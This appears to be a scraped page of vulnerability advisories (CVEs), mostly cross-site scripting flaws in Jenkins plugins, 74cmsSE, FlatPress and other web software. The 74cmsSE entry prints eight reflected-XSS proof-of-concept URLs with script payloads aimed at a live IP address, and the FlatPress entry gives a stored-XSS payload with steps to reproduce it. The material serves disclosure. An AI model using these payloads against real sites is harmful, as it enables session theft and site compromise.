Jenkins Embeddable Build Status Plugin 2.0.3 and earlier does not correctly perform the ViewStatus permission check in the HTTP endpoint it provides for "unprotected" status badge access, allowing attackers without any permissions to obtain the build status badge icon for any attacker-specified job and/or build.

CVE-2022-34180: Jenkins Security Advisory 2022-06-22

Jenkins Embeddable Build Status Plugin 2.0.3 allows specifying a 'link' query parameter that build status badges will link to, without restricting possible values, resulting in a reflected cross-site scripting (XSS) vulnerability.

CVE-2022-34178: Jenkins Security Advisory 2022-06-22

Jenkins Agent Server Parameter Plugin 1.1 and earlier does not escape the name and description of Agent Server parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

CVE-2022-34183: Jenkins Security Advisory 2022-06-22

A cross-site request forgery (CSRF) vulnerability in Jenkins Beaker builder Plugin 1.10 and earlier allows attackers to connect to an attacker-specified URL.

CVE-2022-34207: Jenkins Security Advisory 2022-06-22

A missing permission check in Jenkins EasyQA Plugin 1.0 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified HTTP server.

CVE-2022-34204: Jenkins Security Advisory 2022-06-22

Jenkins Embeddable Build Status Plugin 2.0.3 and earlier allows specifying a `style` query parameter that is used to choose a different SVG image style without restricting possible values, resulting in a relative path traversal vulnerability that allows attackers without Overall/Read permission to specify paths to other SVG images on the Jenkins controller file system.

CVE-2022-34179: Jenkins Security Advisory 2022-06-22

Stored XSS and SQL injection vulnerability in MaxBoard could lead to occur Remote Code Execution, which could lead to information exposure and privilege escalation.

**KISA 인터넷 보호나라&KrCERT**

\[나주본원\] (58324) 전라남도 나주시 진흥길 9 한국인터넷진흥원 대표번호 : 1433-25(수신자 요금 부담)

\[서울청사\] (05717) 서울시 송파구 중대로 135 (가락동) IT벤처타워 \[해킹ㆍ스팸개인정보침해 신고 118\]

Copyright(C) 2021 KISA. All rights reserved.

CVE-2021-26636: KISA 인터넷 보호나라&KrCERT

74cmsSE v3.5.1 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /index/jobfairol/show/.

**Vulnerability name**：Reflective XSS  
**Date of Discovery**: 30/5/2022  
**Affected version**: 74cmsSE\_v3.5.1  
**Download link**: http://www.74cms.com/downloadse/show/id/68.html  
Vulnerability Description:  
The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.

Vulnerability location：Many places，Here are some places I found:  
Verification process：  
1、exp: http://124.223.95.129:8766/index/jobfairol/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>

With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS

2、exp：http://124.223.95.129:8766/job/?"<ScRiPt>alert("xss");<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

3、exp：http://124.223.95.129:8766/company/?"<ScRiPt>alert(1)<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

4、exp：http://124.223.95.129:8766/company/view\_be\_browsed/total/d1/\_d1\_/?"<ScRiPt>alert(11)<%2FScRiPt>"=2  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

5、exp：http://124.223.95.129:8766/company/service/increment/add/im/d1/\_d1\_/d2/\_d2\_.html?"<ScRiPt>alert(123)<%2FScRiPt>"=world  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

6、exp: http://124.223.95.129:8766/company/account/safety/trade/?"<ScRiPt>alert(555)<%2FScRiPt>"=key  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

7、exp: http://124.223.95.129:8766/index/notice/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

8、exp: http://124.223.95.129:8766/company/down\_resume/total/nature/?"<ScRiPt>alert(11)<%2FScRiPt>"=page

  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

Repair method：  
Filter the data according to the tags and attributes of the whitelist to clear the executable script (such as script tag, oneror attribute of img tag, etc.)

CVE-2022-32124: There are multiple reflective XSS vulnerabilities in this cms · Issue #3 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading

A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**FlatPress 1.2.1 - Stored XSS in the Blog Content**

A stored Cross Site Scripting (XSS) vulnerability exists in version 1.2.1 of the FlatPress application that allows for arbitrary execution of JavaScript commands.

**Steps to reproduce the vulnerability**

1.  Visit the FlatPress **Administration area**.
2.  Navigate to the **Entries** -> **Write Entry**.
3.  Enter any **Subject**.
4.  In the content area put the following payload:
    *   <script>alert(document.cookie)</script>

5.  Click the **Save&Continue** button.
6.  Stored XSS payload is triggered.

*   Also we can verify the stored XSS payload by navigating to the home page.

Discovered by Martin Kubecka, September 15 2021

Copy link

Member

** **azett** commented Oct 19, 2021**

Hi, thanks for reporting this.  
As legitimated site admin, it is okay to add custom HTML or JS to your page - the described behaviour is intended.  
Does your findings implicate a way to exploit this behaviour _without_ being logged in as site admin?  
Thanks and regards,  
Arvid

2 participants

CVE-2021-41432: Stored XSS in the Blog Content · Issue #88 · flatpressblog/flatpress

Cross Site Scripting (XSS) vulnerability in sourcecodester School File Management System 1.0 via the Firtstname parameter to the Update Account form in student_profile.php.

Tag

#xss